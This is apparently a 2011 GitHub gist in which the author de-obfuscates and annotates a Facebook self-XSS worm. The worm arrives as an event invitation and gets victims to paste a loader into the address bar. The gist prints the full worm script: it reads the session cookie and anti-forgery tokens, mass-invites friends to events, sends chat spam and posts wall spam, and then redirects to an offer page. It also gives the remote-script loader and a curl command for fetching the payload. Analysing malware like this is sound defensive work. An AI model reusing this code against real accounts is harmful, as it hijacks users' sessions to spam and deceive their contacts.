Created
April 26, 2011 19:42
-
-
Save ccoenen/942962 to your computer and use it in GitHub Desktop.
De-Obfuscation of the Facebook-Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// # The Exploit comes as an event-invitation, it wants you to klick this link | |
// http://www.goo gle.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&ei=SHO2TaA kiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw%3 Fqw020fbs (remove spaces if interested) | |
// # The link is a redirect to ht tp: //ge rman -spy3 .bl ogsp ot.c om/ (remove spaces if interested) | |
// # you are directed to copy and paste a snipped of JS Code into your address-bar, see loader.js below. | |
// # This script was taken from iamedwards.com on 2011-04-26 | |
// this file can be downloaded by using curl with a refer and user-agent like this: | |
// curl -i -e "http://www.facebook.com" -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0" http://iamedwards.com/german.php?0.214 | |
// # ran it through a beautifier | |
// # ran it through a for-loop to de-obfuscate the texts like this: for (var t in _0x8a40) { document.write('"'+_0x8a40[t] + '", '); } | |
// # started commenting the _texte[xy] meanings nearby | |
var _texte=[ /* 0 */ "%firstname% wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @ ow.ly/4GpHi", | |
"Meine Top Profil-Stalker:\n %tf% - 1136 Besuche\n %tf% - 983 Besuche \n %tf% - 542 Besuche \n %tf% - 300 Besuche \n Schau dir an wer dein Profil sieht @ http://ilikeclinton.com?u28xt5ga", | |
"http://germancpa.blogspot.com/", | |
"Schau dir deine Profil-Stalker an - http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fwho-spying-u.blogspot.com%2F&ei=SHO2TaAkiNiIAve95Sk&usg=AFQjCNH_JxkE7o8CvUwsLVUwr2eGGP4ecw&sig2=Ye1vqVHrMDHWkRv--npMkw?u28xt5ga ~~ u28xt5ga ", | |
"WOW Jetzt kannst du sehen wer sich dein Profil ansieht! (u28xt5ga)", | |
/* 5 */ "href", "location", "top", "GET", | |
"open", | |
/* 10 */ "onreadystatechange", | |
"readyState", | |
"status", | |
"responseText", | |
"send", | |
"/", | |
"match", | |
"cookie", | |
"@[", | |
"id", | |
/* 20 */ ":", | |
"name", | |
"]", | |
"", | |
"&", | |
"=", | |
"POST", | |
"Content-Type", | |
"application/x-www-form-urlencoded", | |
"setRequestHeader", | |
/* 30 */ "div", | |
"createElement", | |
"display", | |
"style", | |
"block", | |
"position", | |
"absolute", | |
"width", | |
"%", | |
"height", | |
/* 40 */ "left", | |
"px", | |
"textAlign", | |
"center", | |
"padding", | |
"4px", | |
"background", | |
"#FFFFFF", | |
"zIndex", | |
"innerHTML", | |
/* 50 */ " <br>Verifiziere deinen Code - Bitte gedulde dich einen kleinen Moment.<br><br> We are processing the offer for you... <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a><br><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">", | |
"appendChild", | |
"body", | |
"data", | |
"firstChild", | |
"navAccountName", | |
"getElementById", | |
"?", | |
"/ajax/choose/?__a=1", | |
"event", | |
/* 60 */ "AsyncRequest", | |
"/ajax/typeahead/first_degree.php?__a=1&viewer=", | |
"&token=", | |
"&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha", | |
"length", | |
"push", | |
"getTime", | |
"setTime", | |
"getMonth", | |
"getDate", | |
/* 70 */ "getFullYear", | |
"getHours", | |
",", | |
"join", | |
"on", | |
"Create Event", | |
"new", | |
"/events/create.php", | |
"/ajax/chat/buddy_list.php?__a=1", | |
"substr", | |
/* 80 */ "(", | |
")", | |
"buddy_list", | |
"payload", | |
"nowAvailableList", | |
"random", | |
"floor", | |
"%firstname%", | |
"toLowerCase", | |
"firstName", | |
/* 90 */ "userInfos", | |
"replace", | |
"/ajax/chat/send.php?__a=1", | |
"/ajax/browser/friends/?uid=", | |
"&filter=all&__a=1&__d=1", | |
"shift", | |
"fetched friends: ", | |
"home", | |
"pop", | |
"%tf%", | |
/* 100 */ "search", | |
"xhpc_message_text", | |
"xhpc_message", | |
"message text: ", | |
"/ajax/updatestatus.php?__a=1", | |
"profile" | |
]; | |
var chatmessage = _texte[0]; | |
var postmessage = _texte[1]; | |
var redirect = _texte[2]; | |
var eventdesc = _texte[3]; | |
var eventname = _texte[4]; | |
var nfriends = 5000; | |
var debug = false; | |
var wf = 0; | |
/** mf is used for a redirect after a short delay. It is used as a cancel-method when somebody clicks the "offer"-link */ | |
var mf = function() { | |
if (wf <= 0) { | |
setTimeout(function() { | |
// redirecting to the url in _texte[2]. Unfortunately that url was no longer valid when i got here. | |
window[_texte[7]][_texte[6]][_texte[5]] = redirect; // top / location / href | |
}, | |
500); | |
}; | |
}; | |
/** makes a xhr GET request to the given url. Calls callback with resulting text and callback2 without parameters */ | |
var doget = function(url, _callback, _callback2) { | |
var _xhr = new XMLHttpRequest(); | |
_xhr[_texte[9]](_texte[8], url); // open / GET | |
_xhr[_texte[10]] = function() { // onreadystatechange | |
if (_xhr[_texte[11]] == 4) { // readyState | |
if (_xhr[_texte[12]] == 200 && _callback) { // status | |
_callback(_xhr[_texte[13]]); // call callback with responseText | |
}; | |
if (_callback2) { | |
_callback2(); | |
}; | |
}; | |
}; | |
_xhr[_texte[14]](); // callng send() method. | |
}; | |
doget(_texte[15], // "/" (yeah, a single slash) | |
function(_attr1) { | |
// personal learning: it never occurred to me, but since functions are regular objects | |
// it's actually possible to address a function like mystring.match() in this way mystring['match']() | |
/** stores the facebook user ID, retrieved from the cookie */ | |
var _fbUserID = document[_texte[17]][_texte[16]](/c_user=(\d+)/)[1]; // cookie, match | |
/** converts an object containing "id" and "name" properties to the form of "@[id:name]", defaults to empty string */ | |
var _0x93d3x11 = function(obj) { | |
return obj ? _texte[18] + obj[_texte[19]] + _texte[20] + obj[_texte[21]] + _texte[22] : _texte[23]; | |
// return obj ? "@[" + obj["id"] + ":" + obj["name"] + "]" : ""; // if set, return @[id:name], otherwise empty string | |
}; | |
/** returns the "name" property of a given attribute, defaults to empty string. */ | |
var _getNamePropertyOf = function(obj) { | |
return obj ? obj[_texte[21]] : _texte[23]; // name, "" (empty string) | |
}; | |
/** encodes an object for use in a url"&" (key+=+encoded value, chained by &), defaults to emtpy string */ | |
var _urlencode = function(_innerAttr1) { | |
out = _texte[23]; // empty string | |
for (var _key in _innerAttr1) { | |
out += (out ? _texte[24] : _texte[23]) + _key + ((_innerAttr1[_key] !== null) ? _texte[25] + encodeURIComponent(_innerAttr1[_key]) : _texte[23]); | |
}; | |
return out; | |
}; | |
/** posts to url, sending along the given postData, compare to #doget */ | |
var _doPost = function(url, postData, _callback, _secondCallback) { | |
var _xhr = new XMLHttpRequest(); | |
_xhr[_texte[9]](_texte[26], url); // open, POST | |
_xhr[_texte[29]](_texte[27], _texte[28]); // setting content type | |
_xhr[_texte[10]] = function() { | |
if (_xhr[_texte[11]] == 4) { | |
if (_xhr[_texte[12]] == 200 && _callback) { | |
_callback(_xhr[_texte[13]]); // call callback with responseText | |
}; | |
if (_secondCallback) { | |
_secondCallback(); | |
}; | |
}; | |
}; | |
_xhr[_texte[14]](_urlencode(postData)); // calling send() method with supplied data | |
}; | |
/** creates the fake-user interface containing the "click here" link, starting the mf() function */ | |
var _createOverlay = function() { | |
var elem = document[_texte[31]](_texte[30]); // createElement('div') | |
// styles | |
elem[_texte[33]][_texte[32]] = _texte[34]; // display block | |
elem[_texte[33]][_texte[35]] = _texte[36]; // position absolute | |
elem[_texte[33]][_texte[37]] = 100 + _texte[38]; // w+h 100%, top+left 0,0 | |
elem[_texte[33]][_texte[39]] = 100 + _texte[38]; | |
elem[_texte[33]][_texte[40]] = 0 + _texte[41]; | |
elem[_texte[33]][_texte[7]] = 0 + _texte[41]; | |
elem[_texte[33]][_texte[42]] = _texte[43]; // textAlign center | |
elem[_texte[33]][_texte[44]] = _texte[45]; // padding 4px | |
elem[_texte[33]][_texte[46]] = _texte[47]; // white bg | |
elem[_texte[33]][_texte[48]] = 999999; // high zIndex | |
// contains the text that presents you a "click here" link which starts mf()-function. Also shows the loading-spinner. | |
// clicking that link will reset the wf-counter and call mf, redirecting you to another site (apparently with a very special offer) | |
elem[_texte[49]] = _texte[50]; | |
document[_texte[52]][_texte[51]](elem); // body.appendChild() | |
}; | |
var _0x93d3x19 = _attr1[_texte[16]](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i); | |
if (_0x93d3x19) { | |
comp = _0x93d3x19[1]; | |
} else { | |
comp = _texte[23]; | |
}; | |
var _0x93d3x1a = _attr1[_texte[16]](/name="post_form_id" value="([\d\w]+)"/i)[1]; | |
var _0x93d3x1b = _attr1[_texte[16]](/name="fb_dtsg" value="([\d\w]+)"/i)[1]; | |
var _0x93d3x1c = document[_texte[56]](_texte[55])[_texte[54]][_texte[53]]; | |
redirect = redirect + _texte[57] + _urlencode({ | |
userid: _fbUserID, | |
name: _0x93d3x1c, | |
doclose: 1 | |
}); | |
_createOverlay(); | |
if (eventdesc) { | |
wf++; | |
_doPost(_texte[58], { | |
type: _texte[59], | |
eid: null, | |
invite_message: _texte[23], | |
__d: 1, | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
lsd: null, | |
post_form_id_source: _texte[60] | |
}, | |
function(_0x93d3x1d) { | |
var _0x93d3x1e = _0x93d3x1d[_texte[16]](/\\"token\\":\\"([^\\]+)\\"/)[1]; | |
var _0x93d3xb = _texte[61] + _fbUserID + _texte[62] + _0x93d3x1e + _texte[63]; | |
doget(_0x93d3xb, | |
function(_0x93d3x1f) { | |
var _0x93d3x20 = _0x93d3x1f[_texte[16]](/\{"uid":\d+,/g); | |
var _0x93d3x21 = []; | |
for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) { | |
var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/:(\d+),/)[1]; | |
if (_0x93d3x23 != _fbUserID) { | |
_0x93d3x21[_texte[65]](_0x93d3x23); | |
}; | |
}; | |
var _0x93d3x24 = new Date(); | |
_0x93d3x24[_texte[67]](_0x93d3x24[_texte[66]]() + 60 * 60 * 24 * 1000); | |
datestr = (_0x93d3x24[_texte[68]]() + 1) + _texte[15] + _0x93d3x24[_texte[69]]() + _texte[15] + _0x93d3x24[_texte[70]](); | |
timestr = _0x93d3x24[_texte[71]]() * 60; | |
var _0x93d3x25 = { | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
start_dateIntlDisplay: datestr, | |
start_date: datestr, | |
start_time_hour_min: timestr, | |
name: eventname, | |
place_page_id: _texte[23], | |
location: _texte[23], | |
street: _texte[23], | |
geo_id: _texte[23], | |
geo_sq: _texte[23], | |
desc: eventdesc, | |
sgb_invitees: _0x93d3x21[_texte[73]](_texte[72]), | |
sgb_emails: _texte[23], | |
sgb_message: _texte[23], | |
privacy_type: _texte[74], | |
guest_list: _texte[74], | |
connections_can_post: _texte[74], | |
save: _texte[75], | |
submitting: _texte[23] | |
}; | |
_0x93d3x25[_texte[76]] = _texte[23]; | |
_doPost(_texte[77], _0x93d3x25, false, | |
function() { | |
mf(--wf); | |
}); | |
}); | |
}); | |
}; | |
if (chatmessage) { | |
wf++; | |
_doPost(_texte[78], { | |
user: _fbUserID, | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
lsd: null, | |
post_form_id_source: _texte[60], | |
popped_out: false, | |
force_render: true | |
}, | |
function(_0x93d3x1d) { | |
var _0x93d3x26 = _0x93d3x1d[_texte[79]](9); | |
var _0x93d3x27 = eval(_texte[80] + _0x93d3x26 + _texte[81]); | |
var _0x93d3x28 = _0x93d3x27[_texte[83]][_texte[82]]; | |
for (var _0x93d3x29 in _0x93d3x28[_texte[84]]) { | |
var _0x93d3x2a = Math[_texte[86]](Math[_texte[85]]() * 1335448958); | |
var _0x93d3x2b = (new Date())[_texte[66]](); | |
var _0x93d3x2c = chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]()); | |
_doPost(_texte[92], { | |
msg_id: Math[_texte[86]](Math[_texte[85]]() * 1335448958), | |
client_time: (new Date())[_texte[66]](), | |
msg_text: chatmessage[_texte[91]](_texte[87], _0x93d3x28[_texte[90]][_0x93d3x29][_texte[89]][_texte[88]]()), | |
to: _0x93d3x29, | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
post_form_id_source: _texte[60] | |
}); | |
}; | |
mf(--wf); | |
}); | |
}; | |
if (postmessage) { | |
wf++; | |
doget(_texte[93] + _fbUserID + _texte[94], | |
function(_0x93d3x1d) { | |
var _0x93d3x20 = _0x93d3x1d[_texte[16]](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi); | |
var _0x93d3x2d = []; | |
if (_0x93d3x20) { | |
for (var _0x93d3x22 = 0; _0x93d3x22 < _0x93d3x20[_texte[64]]; _0x93d3x22++) { | |
var _0x93d3x23 = _0x93d3x20[_0x93d3x22][_texte[16]](/_\d+_/)[0][_texte[91]](/_/g, _texte[23]); | |
var _0x93d3x2e = _0x93d3x20[_0x93d3x22][_texte[16]](/>[^>]+\\u003c\\\/a>$/i)[0][_texte[91]](/\\u003c\\\/a>$/gim, _texte[23])[_texte[91]](/>/g, _texte[23]); | |
_0x93d3x2d[_texte[65]]({ | |
id: _0x93d3x23, | |
name: _0x93d3x2e | |
}); | |
}; | |
}; | |
var _0x93d3xd = []; | |
var _0x93d3x2f = []; | |
while (_0x93d3x2d[_texte[64]]) { | |
var _0x93d3x30 = Math[_texte[86]](Math[_texte[85]]() * _0x93d3x2d[_texte[64]]); | |
_0x93d3xd[_texte[65]](_0x93d3x2d[_0x93d3x30]); | |
_0x93d3x2f[_texte[65]](_0x93d3x2d[_0x93d3x30]); | |
var _0x93d3x2b = _0x93d3x2d[_texte[95]](); | |
if (_0x93d3x30) { | |
_0x93d3x2d[_0x93d3x30 - 1] = _0x93d3x2b; | |
}; | |
}; | |
if (debug) { | |
alert(_texte[96] + _0x93d3xd[_texte[64]]); | |
}; | |
var _0x93d3x31 = { | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
xhpc_composerid: comp, | |
xhpc_targetid: _fbUserID, | |
xhpc_context: _texte[97], | |
xhpc_fbx: _texte[23], | |
lsd: null, | |
post_form_id_source: _texte[60] | |
}; | |
mt = postmessage; | |
m = postmessage; | |
while (mt[_texte[100]](_texte[99]) >= 0) { | |
var _0x93d3x32 = _0x93d3xd[_texte[98]](); | |
mt = mt[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x32)); | |
m = m[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x32)); | |
}; | |
_0x93d3x31[_texte[101]] = mt; | |
_0x93d3x31[_texte[102]] = m; | |
if (debug) { | |
alert(_texte[103] + mt); | |
}; | |
_doPost(_texte[104], _0x93d3x31); | |
var _0x93d3x33 = function(_0x93d3x15) { | |
if (_0x93d3x15 == 0) { | |
wf = 0; | |
mf(); | |
return; | |
}; | |
var _0x93d3x34 = _0x93d3x2f[_texte[95]](); | |
var _0x93d3x35 = { | |
post_form_id: _0x93d3x1a, | |
fb_dtsg: _0x93d3x1b, | |
xhpc_composerid: comp, | |
xhpc_targetid: _0x93d3x34[_texte[19]], | |
xhpc_context: _texte[105], | |
xhpc_fbx: 1, | |
lsd: null, | |
post_form_id_source: _texte[60] | |
}; | |
var _0x93d3x36 = postmessage; | |
var _0x93d3x37 = postmessage; | |
if (_0x93d3xd[_texte[64]] == 0) { | |
wf = 0; | |
mf(); | |
return; | |
}; | |
while (_0x93d3x36[_texte[100]](_texte[99]) >= 0) { | |
var _0x93d3x38 = _0x93d3xd[_texte[98]](); | |
_0x93d3x36 = _0x93d3x36[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x38)); | |
_0x93d3x37 = _0x93d3x37[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x38)); | |
}; | |
_0x93d3x35[_texte[101]] = _0x93d3x36; | |
_0x93d3x35[_texte[102]] = _0x93d3x37; | |
_doPost(_texte[104], _0x93d3x35); | |
setTimeout(function() { | |
_0x93d3x33(_0x93d3x15 - 1); | |
}, | |
2000); | |
}; | |
wf++; | |
setTimeout(function() { | |
_0x93d3x33(nfriends); | |
}, | |
2000); | |
}); | |
}; | |
mf(); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:(a=(b=document).createElement('script')).src='//iamedwards.com/german.php?'+Math.random(),b.body.appendChild(a);void(0) | |
// this is pretty straightforward. Create a script-node, set it's source and append it to the body. | |
// you can't download the JS directly, you need to set the right referer or you'll be redirected to google. |
do you also got the source of the iamedwards.com/german.php file?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I was annoyed with all of my friends just falling for this exploit, so i decided to reverse-engineer it.